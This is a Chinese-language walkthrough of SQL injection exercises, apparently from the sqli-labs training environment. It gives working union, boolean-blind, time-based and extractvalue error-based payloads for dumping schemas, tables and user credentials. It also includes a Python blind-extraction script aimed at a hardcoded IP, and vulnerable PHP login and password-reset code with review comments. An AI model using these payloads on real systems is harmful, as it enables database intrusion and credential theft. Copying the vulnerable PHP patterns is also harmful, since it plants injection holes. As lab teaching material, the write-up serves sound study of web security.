?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
(id=-1 让原查询查不到任何行,这样 union 拼出来的那一行才会被显示在第 2 列的位置。)
数据库爆出来了,爆表名
?id=-1' union select 1,(select group_concat(table_name) from information_schema.columns where table_schema="security"),3 --+
(注:information_schema.columns 每个字段一行,这样 group_concat 会把每个表名重复若干次,而且容易超过 group_concat_max_len(默认 1024 字节);改查 information_schema.tables,或写成 group_concat(distinct table_name) 更干净。)
表名出来了,爆字段
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --+
(注:这里没有限定 table_schema,若别的库里也有叫 users 的表,字段名会混在一起;加上 and table_schema=database() 更稳妥。)
需要的数据都有了,咱可以直接把库给脱下来了
Less-2 - Less-4
这几题都一样,无非是注入点周围包裹的东西不一样,不多赘述,过。
Less-5 | 布尔盲注
?id=1
眉清目秀,啥都木有。
?id=1"' 一通测试下来,发现页面有了报错信息
如何利用报错信息注入呢?(有回显的数据库报错本身就可以做报错注入,见文末的 extractvalue 写法;这里先走布尔盲注的路子。)
?id=1' and 1 = 1 --+
?id=2' and 2 = 1 --+
(前一条条件为真,页面正常回显;后一条条件为假,页面无回显。页面只泄露"真/假"一个比特,这就是布尔盲注的依据。)
那有意思的就来了,嘻嘻
mysql> select ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0);
+-----------------------------------------------------------------------------------------------------+
| ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0) |
+-----------------------------------------------------------------------------------------------------+
| 1 |
+-----------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
(注:这里返回 1 并不是因为首字符真的"等于 0":MySQL 把字符串和数字比较时会先把字符串隐式转成数字,非数字开头的字符串转成 0,所以 'i'=0 为真。要逐字符比较,应当像下面脚本那样先用 ascii() 取数值再比较,否则会被这种隐式转换误导。)
爆数据库
import requests
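# Base URL of the Less-5 target. Only run this against a host you are authorised to test.
url = "http://39.104.82.167/Less-5/?id="
# Marker that Less-5 prints only when the injected condition is true.
TRUE_MARKER = "You are in..........."


def build_payload(query, position, char_code):
    """Return the boolean-blind probe for one character.

    The probe is true iff the character at `position` (1-based, substr semantics)
    of `query`'s single-string result has ASCII value `char_code`.  The string is
    identical to the original script's payload when `query` is the schemata query.
    """
    return f"1' and ascii(substr(({query}),{position},1)) = {char_code} --+"


def extract_string(query, is_true, max_len=255):
    """Recover the result of `query` one character at a time via the oracle `is_true`.

    is_true(payload) -> bool must answer whether the injected condition held
    (for Less-5: whether the page contains TRUE_MARKER).

    Fixes relative to the original loop:
    - positions start at 1: substr(s, 0, 1) is '' in MySQL and ascii('') = 0, so the
      old j=0 iteration always "matched" k=0 and appended a NUL character;
    - the unused outer `for i in range(256)` is gone - it re-ran the whole
      extraction 256 times and appended the result 256 times;
    - extraction stops when no code in 1..255 matches, i.e. past the end of the
      string, instead of appending NULs until j hits 255.

    This is a linear search (up to 255 requests per character); the `>`-style
    comparisons used later on the page would allow a ~8-request binary search.
    Returns the recovered string (also printed progressively, like the original).
    """
    recovered = ""
    for position in range(1, max_len + 1):
        for char_code in range(1, 256):
            if is_true(build_payload(query, position, char_code)):
                recovered += chr(char_code)
                print(recovered)
                break
        else:
            # No candidate matched: we are past the last character.
            break
    return recovered


def page_says_true(payload):
    """Oracle for Less-5: send the probe and report whether the success marker appears."""
    r = requests.get(url + payload)
    return TRUE_MARKER in r.text


if __name__ == "__main__":
    # Dump all schema names, as the original script did.
    res = extract_string("select group_concat(schema_name) from information_schema.schemata", page_says_true)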
更改payload来爆表
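# Same probe as the schema dump, but the subquery now lists the tables of the
# `security` schema.  `distinct` is added because information_schema.columns has
# one row per column, so a plain group_concat(table_name) repeats every table once
# per column and can overrun group_concat_max_len (1024 bytes by default).
# `j` (1-based position) and `k` (candidate ASCII value) come from the enclosing loops.
payload = f"1' and ascii(substr((select group_concat(distinct table_name) from information_schema.columns where table_schema=\"security\"),{j},1)) = {k} --+"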
更改payload 来爆字段
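# Probe for the column names of `users`.  Two fixes versus the original line:
# - the original wrote table_name="users" with unescaped double quotes inside a
#   double-quoted f-string, which is a SyntaxError; the quotes are escaped as in
#   the table-name payload above;
# - the subquery is restricted to table_schema=database(), as the later
#   time-based payloads on this page do, so a same-named table in another
#   schema cannot pollute the result.
# `j` (1-based position) and `k` (candidate ASCII value) come from the enclosing loops.
payload = f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=\"users\"),{j},1)) = {k} --+"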
?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
判断所有表名拼接后的总长度(延时注入:条件为真时执行 sleep(5),响应明显变慢;用响应时间代替页面回显作为真假判断依据)
?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
逐字符判断表名(改变 substr 的起始位置和比较阈值,用 > 做二分可以减少请求次数)
?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
判断所有字段名的长度
?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
逐字符判断字段名。
?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
判断字段内容长度(注:username 和 password 直接拼在一起没有分隔符,不好区分边界;可写成 group_concat(username,0x3a,password) 用冒号隔开,长度阈值相应调整)
?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
<?php
// Including the MySQL connect parameters.
include("../sql-connections/sql-connect.php");
// Silences every PHP warning/notice, so a failed include or query leaves no trace.
error_reporting(0);

// Take the variables.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    // Logging the connection parameters to a file for analysis.
    // NOTE(review): this appends the submitted username and password in
    // plaintext to result.txt next to the script - a credential leak in
    // anything but a lab.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname);
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // Connectivity.
    // NOTE: $uname and $passwd come straight from $_POST with no escaping or
    // parameter binding and are interpolated into the quoted literals below -
    // this is the injection point: a ' in either field closes the literal.
    // The mysql_* extension is removed in PHP 7+; outside the lab use
    // mysqli/PDO with prepared statements.
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    // (The listing is cut here by the author: the closing brace of this
    // if-block and whatever is done with $row are not shown on this page.)
    $row = mysql_fetch_array($result);
// Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); }
// Quote if not a number if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return$value; }
// Take the variables.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    // Making sure uname is not injectable: check_input() (its tail is shown
    // above - it quotes non-numeric values and runs them through
    // mysql_real_escape_string) makes the SELECT below safe for this value.
    $uname=check_input($_POST['uname']);

    // NOTE(review): passwd gets no such treatment and is used raw in the
    // UPDATE further down.
    $passwd=$_POST['passwd'];

    // Logging the connection parameters to a file for analysis.
    // NOTE(review): plaintext credentials appended to result.txt, as in the
    // login script.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);

    // Connectivity. $uname already carries its own quotes from check_input(),
    // hence no quotes around it here.
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        // The username is re-read from the database row, not from the request...
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        // ...and interpolated into the UPDATE without any escaping, together
        // with the raw $passwd.  This is the second-order injection point: a
        // stored username that contains a quote character rewrites the WHERE
        // clause when it is read back here, and a ' in the new password breaks
        // out of the SET value directly.
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo"<br>";
        if (mysql_error())
        {
            // The raw database error is printed to the page: an information
            // leak that also makes error-based injection possible.
            echo'<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo"</br></br>";
            echo"</font>";
        }
        else
        {
            echo'<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo"<br>";
            echo"</font>";
        }
        echo'<img src="../images/flag1.jpg" />';
        //echo 'Your Password:' .$row['password'];
        echo"</font>";
    }
    else
    {
        echo'<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo"</br>";
        echo'<img src="../images/slap1.jpg" />';
        echo"</font>";
    }
}
1' and (extractvalue(1,concat(0x5c,version(),0x5c)))# 爆版本
1' and (extractvalue(1,concat(0x5c,database(),0x5c)))# 爆数据库
1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 爆表名
1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))# 爆字段名
1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b),0x5c)))# 爆字段内容(用派生表 b 再包一层的写法针对 MySQL)。
1' and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))# 爆字段内容。
(注:1. 这组 payload 用 # 截断后面的 SQL,如果是通过 GET 参数发送,要写成 %23,否则 # 会被当成 URL 片段丢掉;2. 0x5c 是反斜杠 \,目的是让 XPath 表达式非法、让报错信息把数据带出来,常见写法也用 0x7e(~);3. extractvalue 的报错回显有长度上限(一次大约只能显示 32 个字符),内容较长时用 substr()/mid() 分段取。)